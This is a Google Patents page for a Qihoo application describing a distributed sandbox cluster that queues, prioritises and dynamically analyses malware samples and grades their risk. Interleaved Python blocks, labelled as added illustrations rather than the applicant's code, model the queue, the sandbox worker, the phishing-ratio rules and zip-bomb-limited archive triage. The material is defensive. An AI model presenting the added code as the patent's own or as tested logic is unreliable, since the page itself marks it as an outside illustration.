CN107171894A - Terminal device, distributed cloud detection system and sample detection method - Google Patents

Info

Publication number
CN107171894A
Authority
CN
China
Prior art keywords
task
data
task information
sample
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN201710453830.3A
Other languages
Chinese (zh)
Inventor
赵征
王磊
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Beijing Qihoo Technology Co Ltd
Original Assignee
Beijing Qihoo Technology Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Beijing Qihoo Technology Co Ltd
Priority to CN201710453830.3A
Publication of CN107171894A
Legal status: Pending

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L43/00 Arrangements for monitoring or testing data switching networks
    • H04L43/50 Testing arrangements
    • H04L67/00 Network arrangements or protocols for supporting network services or applications
    • H04L67/01 Protocols
    • H04L67/10 Protocols in which an application is distributed across nodes in the network

Abstract

Embodiments of the invention provide a terminal device, a distributed cloud detection system and a sample detection method. The distributed cloud detection system includes multiple single-node sandboxes. The method includes: determining multiple pending task information items according to a first preset rule and sending them to a shared queue; after at least one request message is received, obtaining the task information corresponding to each request message from the shared queue, executing the distributed tasks in the multiple single-node sandboxes respectively, and obtaining the data produced during task execution; and sending the data produced during task execution to the corresponding database. Embodiments of the invention can detect very large numbers of samples and improve the efficiency of sample detection.

Description

Terminal device, distributed cloud detection system and sample detection method
Technical field
The present invention relates to the field of Internet technology, and in particular to a terminal device, a distributed cloud detection system and a sample detection method.
Background technology
With the development of information technology, the Internet and terminals have developed with it and produce large amounts of data. By analysing this data, the Internet and terminals can be inspected to ensure their information security.
Currently, in one sample detection method, researchers obtain a large number of samples and study and analyse them with detection methods such as static and dynamic analysis. When samples are detected with this prior-art method, the large number of samples must be detected and analysed manually, which is costly and consumes a great deal of time, so the detection efficiency for samples is low.
Summary of the invention
To overcome the above technical problem, or at least partially solve it, the following technical solution is proposed.
According to one aspect, embodiments of the invention provide a sample detection method applied to a distributed cloud detection system. The distributed cloud detection system includes multiple single-node sandboxes, and the method includes:
determining multiple pending task information items according to a first preset rule, and sending the multiple pending task information items to a shared queue;
after at least one request message is received, obtaining the task information corresponding to each request message from the shared queue, executing the tasks distributed to them in the multiple single-node sandboxes respectively, and obtaining the data produced during task execution;
sending the data produced during task execution to the corresponding database.
Specifically, the way in which a single-node sandbox executes a task includes:
reading the task information with the highest priority;
determining whether the highest-priority task information contains a specific sample;
if it contains a specific sample, modifying the specific parameter environment;
after the modification is complete, determining whether to execute the task according to the current resource usage and the parameter configuration in the task information;
after the task has been executed, changing the corresponding task status.
Optionally, after the step of determining whether to execute the task according to the current resource usage and the parameter configuration in the task information, the method further includes:
if it is determined that the task is to be executed, running the task in a virtual machine and storing the data produced during the run to local disk.
Optionally, after the step of determining whether the highest-priority task information contains a specific sample, the method further includes:
if the highest-priority task information does not contain a specific sample but only an md5 identifier, downloading the corresponding sample according to the md5 identifier;
determining, according to the number of tasks currently being executed, whether to execute the task containing the downloaded sample;
if it is determined that the task containing the downloaded sample is to be executed, generating a json file according to the downloaded sample, the json file containing the specific information of the task;
generating a report in a specified format according to the specific information of the task, and changing the corresponding task status.
Optionally, a task request is sent to the server according to the usage state information of local resources and/or the task backlog state information in the local database, the task request being used to request task information from the server;
the task information returned by the server is received and stored in the local database.
Specifically, the task information includes task data;
the step of storing the task information in the local database includes:
compressing the task data, and storing the compressed task data in the local database.
Specifically, the step of sending the data produced during task execution to the corresponding database includes:
screening, by a second preset rule, the data that belongs to black data (data confirmed as malicious) out of the data produced during task execution, and sending the data that belongs to black data to the black database.
Optionally, the database is cleaned up every preset time interval.
According to another aspect, embodiments of the invention also provide a distributed cloud detection system, including:
a sandbox cluster entry module, for determining multiple pending task information items according to a first preset rule, sending the multiple pending task information items to a shared queue, and, after at least one request message is received, obtaining the task information corresponding to each request message from the shared queue;
a single-node sandbox module, for executing the tasks distributed to them respectively in multiple single-node sandboxes and obtaining the data produced during task execution;
an expandable distributed storage cluster module, further for sending the data produced while the single-node sandbox module executes tasks to the corresponding database.
Specifically, the single-node sandbox module is specifically for reading the task information with the highest priority; determining whether the highest-priority task information contains a specific sample; modifying the specific parameter environment when a specific sample is contained; after the modification is complete, determining whether to execute the task according to the current resource usage and the parameter configuration in the task information; and changing the corresponding task status after the task has been executed.
Optionally, the single-node sandbox module is specifically further for running the task in a virtual machine if it is determined that the task is to be executed, and storing the data produced during the run to local disk.
Optionally, the single-node sandbox module is specifically further for downloading the corresponding sample according to the md5 identifier when the highest-priority task information does not contain a specific sample but only an md5 identifier; determining, according to the number of tasks currently being executed, whether to execute the task containing the sample downloaded by the download module; generating a json file according to the sample downloaded by the download module when it is determined that the task containing the downloaded sample is to be executed, the json file containing the specific information of the task; generating a report in a specified format according to the specific information of the task; and changing the corresponding task status.
Optionally, the distributed cloud detection system further includes a single-node sandbox data request and resource cleaning module;
the single-node sandbox data request and resource cleaning module is for sending a task request to the server according to the usage state information of local resources and/or the task backlog state information in the local database, the task request being used to request task information from the server; receiving the task information returned by the server; and storing the task information in the local database.
Specifically, the expandable distributed storage cluster module is specifically for screening, by a second preset rule, the data that belongs to black data out of the data produced during task execution, and sending the data that belongs to black data to the black database.
Optionally, the single-node sandbox data request and resource cleaning module is further for cleaning up the database every preset time interval.
Optionally, the distributed cloud detection system further includes a distributed cloud detection system monitoring module;
the distributed cloud detection system monitoring module is for monitoring the sandbox cluster entry module, the single-node sandbox module, the expandable distributed storage cluster module, and the single-node sandbox data request and resource cleaning module.
According to yet another aspect, embodiments of the invention also provide a terminal device whose structure includes a processor and a memory. The memory stores a program that supports the device in performing the above method, and the processor is configured to execute the program stored in the memory.
According to yet another aspect, embodiments of the invention also provide a computer storage medium for storing the computer software instructions used by the above terminal device, which include the program designed for the terminal device to perform the above aspect.
The invention provides a distributed cloud detection system, a terminal device and a sample detection method. Compared with existing sample detection methods, the invention is applied to a distributed cloud detection system that includes multiple single-node sandboxes: multiple pending task information items are determined according to a first preset rule and sent to a shared queue; after at least one request message is received, the task corresponding to each request message is obtained from the shared queue, the distributed tasks are executed respectively by the multiple single-node sandboxes, the data produced during task execution is obtained, and that data is sent to the corresponding database. In other words, the distributed cloud detection system is provided with multiple single-node sandboxes that can execute the tasks distributed to them at the same time, obtain the data produced during task execution, and send that data to the corresponding database so that samples are detected. Because samples are detected by multiple single-node sandboxes, a large number of samples no longer has to be detected manually one by one, which reduces the cost of sample detection; and because different tasks are executed at the same time by multiple single-node sandboxes, the time spent on sample detection is reduced, so the detection efficiency for samples can be improved.
Additional aspects and advantages of the invention will be set forth in part in the description below, and will in part become apparent from the description or be learned by practice of the invention.
Brief description of the drawings
The above and/or additional aspects and advantages of the invention will become apparent and easy to understand from the following description of embodiments with reference to the accompanying drawings, in which:
Fig. 1 is a flowchart of a sample detection method according to an embodiment of the invention;
Fig. 2 is a schematic diagram of a distributed cloud detection system according to an embodiment of the invention;
Fig. 3 is a schematic structural diagram of a terminal device according to an embodiment of the invention.
Detailed description
Embodiments of the invention are described in detail below; examples of the embodiments are shown in the drawings, where the same or similar reference numerals throughout denote the same or similar elements, or elements with the same or similar functions. The embodiments described below with reference to the drawings are exemplary, serve only to explain the invention, and are not to be construed as limiting the claims.
Those skilled in the art will understand that, unless expressly stated otherwise, the singular forms "a", "an", "the" and "said" used herein may also include the plural. It is to be further understood that the word "comprising" used in the specification indicates the presence of the stated features, integers, steps, operations, elements and/or components, but does not exclude the presence or addition of one or more other features, integers, steps, operations, elements, components and/or groups thereof. When an element is said to be "connected" or "coupled" to another element, it may be directly connected or coupled to the other element, or intermediate elements may be present. "Connected" or "coupled" as used herein may include wireless connection or wireless coupling. The term "and/or" as used herein includes any and all combinations of one or more of the associated listed items.
Those skilled in the art will understand that, unless otherwise defined, all terms used herein (including technical and scientific terms) have the same meaning as commonly understood by a person of ordinary skill in the art to which the invention belongs. It is also to be understood that terms such as those defined in general dictionaries are to be interpreted as having a meaning consistent with their meaning in the context of the prior art and, unless specifically defined here, are not to be interpreted in an idealised or overly formal sense.
Those skilled in the art will understand that "terminal" and "terminal device" as used herein include both devices that only have a wireless signal receiver and no transmitting capability, and devices with receiving and transmitting hardware that can communicate in both directions over a bidirectional communication link. Such devices may include: cellular or other communication devices with a single-line display, a multi-line display or no multi-line display; PCS (Personal Communications Service) devices, which may combine voice, data processing, fax and/or data communication capabilities; PDAs (Personal Digital Assistants), which may include a radio-frequency receiver, pager, Internet/intranet access, web browser, notepad, calendar and/or GPS (Global Positioning System) receiver; and conventional laptop and/or palmtop computers or other devices that have and/or include a radio-frequency receiver. A "terminal" or "terminal device" as used herein may be portable, transportable, installed in a vehicle (air, sea and/or land), or suited and/or configured to operate locally and/or in distributed form at any other location on earth and/or in space. A "terminal" or "terminal device" as used herein may also be a communication terminal, an Internet access terminal or a music/video playback terminal, for example a PDA, a MID (Mobile Internet Device) and/or a mobile phone with music/video playback functions, a smart television, a set-top box and the like.
Embodiment one
Embodiments of the invention provide a sample detection method, shown in Fig. 1, applied to a distributed cloud detection system that includes multiple single-node sandboxes. The method includes:
Step 101: determine multiple pending task information items according to a first preset rule, and send the multiple pending task information items to a shared queue.
In this embodiment, the first preset rule may include the priority of the task together with other combined factors.
Before step 101, raw data is collected. The raw data includes analysis results for various types of network malicious behaviour, for example URLs of malicious web pages and sample objects of various vulnerabilities, viruses, trojans and attacks.
In this embodiment the collected raw data includes analysis results for various types of network malicious behaviour, for example URLs of malicious web pages and sample objects of various vulnerabilities, viruses, trojans and attacks. Sample objects also include 0Day and NDay vulnerabilities, 0Days within their exposure period, information on web pages injected with trojans (drive-by downloads), follow-up on important websites and injected pages, and so on. A 0Day is a vulnerability that has been discovered (possibly without being disclosed) and for which the vendor has no patch; once found, such vulnerabilities may be exploited immediately, for example to edit the registry, download files or run files. A sample object may take the form of a file, an executable program and so on; the embodiments do not limit this.
In this embodiment the collected raw threat data may be data uploaded by clients, where a client may be a user terminal that detects various kinds of network malicious behaviour. In practice the client may monitor dangerous processes during the login or payment flow against a preset process list; monitor the files transmitted during the login or payment flow against a preset safe file list; monitor browser calls during the login or payment flow; monitor calls that read keyboard input during the login or payment flow; or monitor the data objects that the client transmits during the login or payment flow.
For example, when the client detects that login- or payment-related data is being transmitted to an object unrelated to the login or payment flow, the transmitted data object should be intercepted; and the web pages opened during the login or payment flow are monitored, because the payment page a user opens may be a forgery by a malicious third party that looks like the genuine payment page.
When monitoring files such as executables, not only the real-time download of the file can be monitored but also its runtime behaviour when it is launched and afterwards. After the client obtains threat data during detection, it generates a log that is temporarily stored in a log buffer list. The client's log-recording thread polls the log buffer list, processes the logs in first-in-first-out order and appends the log content to a log record file; an external scheduling module process obtains and processes that log file and uploads it. For example, the client may send a message fetch request containing a push time and a list of messages already received; new messages not yet delivered to the client are taken from the message queue and a response message is fed back to the client containing a second push time and a list of the new messages, the list holding the message id and content of every new message issued to the client in this round and the second push time being the push time of those new messages. The uploaded threat data may include environment and document base information and detection function point trigger data. The environment and document base information is output in forms such as flow logs; the detection function point trigger data is output in the form of a behaviour log, Actions.log. Taking a sample as an example, the environment and document base information comprises the sample process file MD5, the sample process file path, the names and file versions of the main system modules and so on; the detection function point trigger data comprises the process ID and/or thread ID involved at the time of detection, the name of the tampered function, the pointer value after tampering, the hooked API and so on.
In this embodiment a detection task is established from the source information of the sample and/or the sample reliability determined by screening the sample, and a detection priority is determined for the detection task. If the sample reliability determined by screening is high, the detection task is given a high detection priority; if it is low, the detection task is given a low detection priority. Reliability here relates to the likelihood that the sample belongs to black data and to its association with important websites.
Step 102: after at least one request message is received, obtain the task information corresponding to each request message from the shared queue, execute the distributed tasks in the multiple single-node sandboxes, and obtain the data produced during task execution.
In this embodiment, after at least one request message is received, the task corresponding to each request message is obtained from the shared queue. A scheduling node can distribute the detection tasks to each single-node sandbox; each single-node sandbox executes the tasks distributed to it and obtains the task detection results.
The scheduling node distributes the detection tasks it receives to the distributed cloud detection system. To further improve the security of threat-data detection, the distributed cloud detection system may specifically be a distributed sandbox cluster system that detects and analyses using sandbox technology: the sandbox provides a closed running environment for the suspicious sample log, so that even if the sample behind the suspicious sample log really contains an exploit, the server side is not harmed.
In this embodiment a static engine and a dynamic engine are deployed in the distributed cluster system to perform static and dynamic analysis of the threat detection tasks respectively. The static engine can extract URL information and/or sample format information for static analysis; the extracted URL information includes but is not limited to IP, domain name and URL MD5 value, and the sample format information includes but is not limited to vulnerability/virus name, URL information and character-string similarity of PE samples. The dynamic engine mainly captures operating-system behaviour data, vulnerability-related behaviour data and/or network-related behaviour data for dynamic analysis.
Taking a kernel vulnerability as an example, the dynamic engine hooks the API calls related to critical behaviour or functions and compares whether the names or attributes of the related functions have been tampered with or replaced, so as to obtain an identification log of the kernel vulnerability.
PE files that have passed the cloud scan are analysed and detected again in full using the sandbox. For non-PE files, such as Rich Text Format, PDF, doc (a file extension), docx (a file extension) and excel formats, if the file can be decompressed further, decompression is continued; if the file is detectable metadata, QEX static analysis, shellcode semi-dynamic detection and lightVM lightweight dynamic analysis are performed. Afterwards the metadata detected by these three methods is detected again with the sandbox. When detecting whether a file has malicious behaviour, the danger level of the malicious behaviour is preferably divided into three grades in this embodiment. First, high danger: the metadata can be confirmed as malicious code, for example a confirmed trojan sample, obvious malicious behaviour or an exploit that can be triggered. Second, medium danger: there is suspected malicious behaviour that cannot be confirmed, or a suspected exploit without confirmed malicious behaviour, for example the sample is found to access sensitive locations, or the sample crashes a program without a trigger being executed. Third, low danger: a file that has not been confirmed harmless and may endanger system security; it can be understood as a file carrying risk.
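The "decompress and continue" loop for non-PE files is the step where attacker-supplied input can cost unbounded work: a document that is itself an archive (docx is a zip) can nest archives inside archives or declare tiny members that inflate to gigabytes. The following is an added example, not code from the patent or from Qihoo, of the routing decision with a depth limit and a byte budget in front of the static and lightweight dynamic engines. The format checks (MZ for PE, PK for zip containers), the limit values, the route names and the constructed archives are assumptions for illustration; the QEX, shellcode and lightVM engines themselves are out of scope here.

```python
import io
import zipfile

# Assumed container limits; the description only says decompression continues
# while the file can still be decompressed, which an attacker-supplied nested
# archive turns into unbounded work unless bounded like this.
MAX_DEPTH = 3
MAX_MEMBERS = 100
MAX_TOTAL_BYTES = 1_000_000


def triage(name: str, blob: bytes, depth: int = 0, budget: dict = None) -> list:
    """Route a file, and every file inside it, to 'sandbox' (PE), 'static'
    (other detectable metadata) or 'refused:...' when a container limit is hit.
    Returns a list of (path, route) pairs in the order the files were seen."""
    budget = budget if budget is not None else {"members": 0, "bytes": 0}
    if blob.startswith(b"MZ"):
        return [(name, "sandbox")]
    if not blob.startswith(b"PK\x03\x04"):
        return [(name, "static")]
    if depth >= MAX_DEPTH:
        return [(name, "refused:depth")]
    try:
        archive = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        # Looks like a zip but cannot be opened: let the static engines look at it.
        return [(name, "static")]
    decisions = []
    with archive:
        for member in archive.infolist():
            path = f"{name}/{member.filename}"
            budget["members"] += 1
            remaining = MAX_TOTAL_BYTES - budget["bytes"]
            if budget["members"] > MAX_MEMBERS or remaining <= 0:
                decisions.append((path, "refused:budget"))
                break
            # Read one byte past the remaining budget instead of trusting the
            # size declared in the member header, which a zip bomb can lie about.
            with archive.open(member) as fh:
                data = fh.read(remaining + 1)
            if len(data) > remaining:
                decisions.append((path, "refused:budget"))
                break
            budget["bytes"] += len(data)
            decisions.extend(triage(path, data, depth + 1, budget))
    return decisions


def make_zip(entries: dict) -> bytes:
    """Build an in-memory zip from {name: bytes} (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for member_name, data in entries.items():
            zf.writestr(member_name, data)
    return buf.getvalue()


def demo_nested() -> list:
    # Constructed archive: a zip holding another zip with a PE stub and an RTF,
    # plus a PDF alongside it.
    inner = make_zip({"payload.exe": b"MZ\x90\x00 constructed PE stub",
                      "notes.rtf": b"{\\rtf1 constructed}"})
    outer = make_zip({"inner.zip": inner, "report.pdf": b"%PDF-1.4 constructed"})
    return triage("outer.zip", outer)


def demo_depth() -> list:
    # Constructed archive nested one level deeper than MAX_DEPTH allows.
    blob = b"MZ constructed"
    for _ in range(MAX_DEPTH + 1):
        blob = make_zip({"n.zip": blob})
    return triage("deep.zip", blob)


def demo_bomb() -> list:
    # Constructed small archive whose single member inflates past MAX_TOTAL_BYTES.
    return triage("bomb.zip", make_zip({"zeros.bin": b"\x00" * (MAX_TOTAL_BYTES + 1)}))
```

The budget is shared across the whole recursion rather than reset per archive, so a hundred small archives cannot each spend a full allowance; and the byte check reads the member rather than trusting its header, because the declared uncompressed size is attacker-controlled.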
In this embodiment the distributed cluster system may, in addition to analysing with its own engines, obtain identification information provided by third-party platforms or third-party engines to enrich the identification results.
The distributed cluster system can also perform association analysis, specifically analysing whether there are associations between URLs and between samples; by analysing the associations within the black data, the accumulated black data grows as more and more data is collected.
In this embodiment the single-node sandbox executes a task by steps a to e below (not marked in the figure), where:
Step a: read the task information with the highest priority.
In this embodiment the scheduling node reads the task information with the current highest priority from the shared queue and distributes it to a single-node sandbox, so that this single-node sandbox executes the task.
For example, the shared queue currently holds three task information items, for task 1, task 2 and task 3, whose priorities from high to low are task 1, task 3, task 2. After a request message is received, the scheduling node first distributes the task information of task 1 to the requesting single-node sandbox, which then executes task 1.
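Steps 101 and 102 together describe a pull-based dispatcher: task information is ranked by a preset rule into a shared queue, and each sandbox's request message is answered with the highest-priority item left. The following is an added example, not code from the patent or from Qihoo, of that exchange with the three-task ordering just described. The scoring inside first_preset_rule, the heap-backed queue, the task and request field names and the RAW_SAMPLES input are assumptions for illustration.

```python
import heapq
import itertools


class SharedQueue:
    """Priority-ordered shared queue (a heap here; the patent does not fix
    the queue technology). Equal priorities are served first-in first-out."""

    def __init__(self):
        self._heap = []
        self._seq = itertools.count()

    def push(self, task: dict, priority: int) -> None:
        # heapq is a min-heap, so negate the priority to pop the highest first;
        # the sequence number breaks ties and keeps dicts out of comparisons.
        heapq.heappush(self._heap, (-priority, next(self._seq), task))

    def pop_highest(self):
        if not self._heap:
            return None
        return heapq.heappop(self._heap)[2]

    def __len__(self) -> int:
        return len(self._heap)


def first_preset_rule(sample: dict) -> int:
    """Assumed scoring for the 'first preset rule'. The description says
    priority follows the sample's reliability from screening and its link to
    important sites; the point values here are an assumption."""
    score = {"high": 2, "medium": 1}.get(sample.get("reliability"), 0)
    if sample.get("important_site"):
        score += 1
    return score


def build_queue(raw_samples) -> SharedQueue:
    """Step 101: turn raw samples into task information and load the shared queue."""
    queue = SharedQueue()
    for sample in raw_samples:
        task = {"task_id": sample["id"],
                "sample_md5": sample.get("md5"),
                "priority": first_preset_rule(sample)}
        queue.push(task, task["priority"])
    return queue


class SchedulingNode:
    """Step 102: answer request messages from sandboxes by handing out the
    highest-priority task still in the shared queue."""

    def __init__(self, queue: SharedQueue):
        self.queue = queue
        self.assignments = {}   # sandbox id -> task ids handed to it

    def handle_request(self, request: dict):
        task = self.queue.pop_highest()
        if task is None:
            return None   # nothing pending; the sandbox should retry later
        self.assignments.setdefault(request["sandbox_id"], []).append(task["task_id"])
        return task


# Constructed input matching the description's example: task 1 outranks
# task 3, which outranks task 2.
RAW_SAMPLES = [
    {"id": "task1", "reliability": "high", "important_site": True},
    {"id": "task2", "reliability": "low"},
    {"id": "task3", "reliability": "medium"},
]


def demo() -> list:
    node = SchedulingNode(build_queue(RAW_SAMPLES))
    served = []
    for sandbox_id in ("sandbox-a", "sandbox-b", "sandbox-a", "sandbox-c"):
        task = node.handle_request({"sandbox_id": sandbox_id})
        served.append(task["task_id"] if task else None)
    return served
```

Because the sandboxes pull rather than being pushed to, a slow or crashed sandbox simply stops asking and the remaining work flows to the others; the fourth request above shows the empty-queue reply a sandbox must be prepared to handle.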
Step b: determine whether the highest-priority task information contains a specific sample.
In this embodiment, after step b the method further includes: if the highest-priority task information does not contain a specific sample but only an md5 identifier, downloading the corresponding sample according to the md5 identifier; determining, according to the number of tasks currently being executed, whether to execute the task containing the downloaded sample; if it is determined that the task containing the downloaded sample is to be executed, generating a json file according to the downloaded sample, the json file containing the specific information of the task; and generating a report in a specified format according to the specific information of the task and changing the corresponding task status.
If the highest-priority task information does not contain a specific sample but only an md5 value, the specific sample corresponding to that md5 value is downloaded from the database, and then whether to execute the task containing the downloaded sample is determined according to the number of tasks the single-node sandbox is currently executing.
The decision is made from the relationship between the number of tasks the single-node sandbox is currently executing and a preset threshold: when that number is not greater than the preset threshold, the task containing the downloaded sample is executed; when it is greater than the preset threshold, the single-node sandbox does not execute the task.
If it is determined that the task containing the downloaded sample is to be executed, the sample log is processed to generate a json file containing the specific information of the task, rule matching is performed on all log information, a report in the specified format is generated, and it is stored in a specified storage component such as mongoDB or ceph.
Step c: if a specific sample is contained, the specific parameter environment is amended.
Here the specific sample may include an Internet Protocol (IP) address, a domain name, and so on.
In this embodiment, the server side provides a cloud security query interface, and the browser can report the IP address of a website to the server through this cloud security query interface.
In this embodiment, given that overseas IP addresses carry a higher risk factor than domestic IP addresses on the Internet, if an IP address is an overseas IP address and the ratio of the number of phishing websites to the number of non-phishing websites under that IP address is higher than a first set threshold, the IP address is stored in the dangerous IP database. In this embodiment, whether a domain name is a dangerous domain name can also be determined directly from the number of phishing websites under the domain name; for example, if the number of phishing websites under a domain name exceeds a set quantity (such as 1000), the domain name can be determined to be a dangerous domain name. In addition, if certain domain names are confirmed to be highly dangerous, they can also be stored in the dangerous domain name database by manual entry.
Alternatively, the dangerous domain name database can store not only the domain name itself but also the risk level of the domain name. In this embodiment, the risk level can be determined by the ratio of the number of phishing websites to the number of non-phishing websites under the domain name: the higher the ratio, the higher the risk level; conversely, the lower the ratio, the lower the risk level.
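The two classification rules above (overseas IP with a phishing ratio over the first set threshold; a domain with more than the set number of phishing sites, graded by ratio) as an added Python example. This is example code written for this page, not code from the patent or from the applicant. The value of the first set threshold, the three risk bands, the list of "overseas" prefixes and the manual-entry level are all assumptions; the page only fixes the 1000-site example and the monotonic ratio-to-level relation.

```python
from collections import Counter

FIRST_THRESHOLD = 0.5          # "first set threshold" of the page: assumed value
DOMAIN_PHISHING_LIMIT = 1000   # the page's example count for a dangerous domain
# Constructed: prefixes treated as overseas (the page only says overseas IPs carry more risk).
OVERSEAS_PREFIXES = ("198.51.100.", "203.0.113.")


def is_overseas(ip):
    return ip.startswith(OVERSEAS_PREFIXES)


def phishing_ratio(counts):
    """Phishing sites / non-phishing sites; infinite when no benign site was seen."""
    return counts["phishing"] / counts["benign"] if counts["benign"] else float("inf")


def risk_level(phishing, non_phishing):
    """Risk level from the ratio: higher ratio, higher level. The three bands are
    an assumption; the page fixes only the monotonic relation."""
    ratio = phishing / non_phishing if non_phishing else float("inf")
    if ratio >= 2.0:
        return 3
    if ratio >= 0.5:
        return 2
    return 1


class DangerDatabase:
    """Dangerous IP database and dangerous domain database (stand-in, in memory)."""

    def __init__(self):
        self.sites_by_ip = {}          # ip -> Counter({"phishing": n, "benign": m})
        self.sites_by_domain = {}      # domain -> Counter(...)
        self.dangerous_ips = set()
        self.dangerous_domains = {}    # domain -> risk level

    def report(self, ip, domain, phishing):
        """One website reported through the cloud security query interface."""
        kind = "phishing" if phishing else "benign"
        self.sites_by_ip.setdefault(ip, Counter())[kind] += 1
        self.sites_by_domain.setdefault(domain, Counter())[kind] += 1
        self._evaluate_ip(ip)
        self._evaluate_domain(domain)

    def _evaluate_ip(self, ip):
        # Overseas IP whose phishing ratio exceeds the first set threshold -> dangerous IP.
        if is_overseas(ip) and phishing_ratio(self.sites_by_ip[ip]) > FIRST_THRESHOLD:
            self.dangerous_ips.add(ip)

    def _evaluate_domain(self, domain):
        # More than the set number of phishing sites -> dangerous domain, graded by ratio.
        c = self.sites_by_domain[domain]
        if c["phishing"] > DOMAIN_PHISHING_LIMIT:
            self.dangerous_domains[domain] = risk_level(c["phishing"], c["benign"])

    def add_domain_manually(self, domain, level=3):
        """Confirmed highly dangerous domains can be entered by hand (level assumed)."""
        self.dangerous_domains[domain] = level
```

Note that a single phishing report from an overseas IP with no benign site yet gives an infinite ratio and immediately marks the IP; a deployment would want a minimum sample count before trusting the ratio, which the page does not specify.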
Step d: after the amendment is finished, determine whether to execute the task according to the usage state of current resources and the parameter configuration information in the task information.
In this embodiment, after the specific parameter environment has been amended, it is determined whether the usage state of current resources is below a remaining-resource threshold, and/or whether the parameter configuration information in the current task information allows the task to be executed. In this embodiment, when the usage state of current resources is not below the remaining-resource threshold, and/or the parameter configuration information in the current task information supports executing the task, it is determined to execute the task.
In this embodiment, if it is determined to execute the task, 200 is returned; if it is determined not to execute the task, 500 is returned. This is not limited in the embodiments of the present invention.
In this embodiment, the following also takes place after step d: if it is determined to execute the task, the task is run in a virtual machine, and the data produced during the run is stored to local disk.
In this embodiment, after the task has been run in the virtual machine, the run result is stored to local disk.
Step e: after the task has finished executing, change the corresponding task status.
In this embodiment, if the task has not been executed, or the task is being executed but has not finished, the task status is the unfinished state; once the task has finished executing, the task status is changed from the unfinished state to the completed state. In this embodiment, if the task has not been executed, the task status is the not-executed state; if the task is being executed but has not finished, the task status is changed to the executing state; if the task has finished executing, the task status is changed to the completed state. This is not limited in the embodiments of the present invention.
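Steps a to e, carried through as one added Python example of a single-node sandbox worker. This is example code written for this page, not code from the patent or from the applicant. The queue ordering convention (lower number = higher priority), the in-memory sample store keyed by md5, the concurrency and resource thresholds, the parameter keys `ip`, `domain` and `allow`, and the reading of "resource usage state not below the remaining-resource threshold" as a free-resource fraction are all assumptions; the run "in the virtual machine" is simulated.

```python
import hashlib
import heapq
import json
from dataclasses import dataclass, field
from typing import Optional

# Constructed stand-in for the page's sample database, keyed by md5 (assumption).
SAMPLE_DB = {
    hashlib.md5(b"constructed sample A").hexdigest(): b"constructed sample A",
}


@dataclass(order=True)
class TaskInfo:
    """Task information as placed in the shared queue; ordered by priority only."""
    priority: int                                   # 1 = highest (assumed convention)
    task_id: str = field(compare=False)
    sample: Optional[bytes] = field(default=None, compare=False)
    md5: Optional[str] = field(default=None, compare=False)
    params: dict = field(default_factory=dict, compare=False)


def build_queue(tasks):
    """The shared queue, modelled as a heap ordered by priority."""
    heap = []
    for t in tasks:
        heapq.heappush(heap, t)
    return heap


class SandboxNode:
    NOT_EXECUTED, EXECUTING, COMPLETED = "not executed", "executing", "completed"

    def __init__(self, max_running=2, remaining_threshold=0.2):
        self.max_running = max_running              # preset threshold on concurrent tasks
        self.remaining_threshold = remaining_threshold
        self.free_resource = 1.0                    # free fraction of resources (assumed model)
        self.running = 0
        self.env = {}                               # the "specific parameter environment"
        self.status = {}                            # task_id -> status (step e)
        self.disk = {}                              # stands in for local disk

    @staticmethod
    def read_highest_priority(shared_queue):
        """Step a: the scheduling node hands out the highest-priority task information."""
        return heapq.heappop(shared_queue)

    def handle(self, task):
        """Steps b to e; returns 200 when the task is executed and 500 otherwise."""
        self.status[task.task_id] = self.NOT_EXECUTED
        if task.sample is None:
            # Step b, md5-only branch: fetch the sample, then apply the concurrency threshold.
            sample = SAMPLE_DB.get(task.md5)
            if sample is None or self.running > self.max_running:
                return 500
            report = self._run(task, sample)
            self.disk[task.task_id + ".json"] = json.dumps(report)   # specified-format report
            return 200
        # Step c: a specific sample (IP, domain, ...) is present, so amend the environment.
        for key in ("ip", "domain"):
            if key in task.params:
                self.env[key] = task.params[key]
        # Step d: resource state and parameter configuration decide whether to execute.
        if self.free_resource < self.remaining_threshold or not task.params.get("allow", True):
            return 500
        self._run(task, task.sample)
        return 200

    def _run(self, task, sample):
        """Simulated run in the virtual machine; the status transitions are step e."""
        self.status[task.task_id] = self.EXECUTING
        self.running += 1
        result = {"task_id": task.task_id, "md5": hashlib.md5(sample).hexdigest(),
                  "size": len(sample)}
        self.disk[task.task_id + ".out"] = result     # run data stored to local disk
        self.running -= 1
        self.status[task.task_id] = self.COMPLETED
        return result


def demo():
    """Constructed run of three queued tasks; returns (task_id, code) pairs and the node."""
    queue = build_queue([
        TaskInfo(2, "task2", sample=b"constructed sample B", params={"ip": "203.0.113.5"}),
        TaskInfo(1, "task1", md5=next(iter(SAMPLE_DB))),
        TaskInfo(3, "task3", sample=b"constructed sample C", params={"allow": False}),
    ])
    node = SandboxNode()
    codes = []
    while queue:
        task = SandboxNode.read_highest_priority(queue)
        codes.append((task.task_id, node.handle(task)))
    return codes, node
```

In `demo()` the md5-only task is served first because of its priority, the task carrying an IP sample amends the environment before running, and the task whose parameter configuration forbids execution is answered with 500 and stays in the not-executed state.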
Step 103: send the data produced during task execution to the corresponding database.
In this embodiment, the database may include a blacklist database, where the blacklist database includes a URL blacklist database, an IP blacklist database and/or a domain name blacklist database.
In this embodiment, the danger level of a sample can be determined from the data produced during task execution. For example, the danger level of a sample can be divided into three levels: the first level, the high-risk level; the second level, the medium-risk level; and the third level, the low-risk level.
In this embodiment, a high-risk sample is one whose original code is confirmed to be malicious code, such as a Trojan sample, a sample with obvious malicious behaviour, or a sample that can trigger a vulnerability. A medium-risk sample is one that shows suspected malicious behaviour which cannot be confirmed, or suspected vulnerability exploitation whose malicious behaviour has not been confirmed; for example, the sample is found to access sensitive locations, or the sample causes the program to crash without a trigger being executed. A low-risk sample is a file that has not been confirmed harmless and may endanger system security; it can be understood as a file that carries risk.
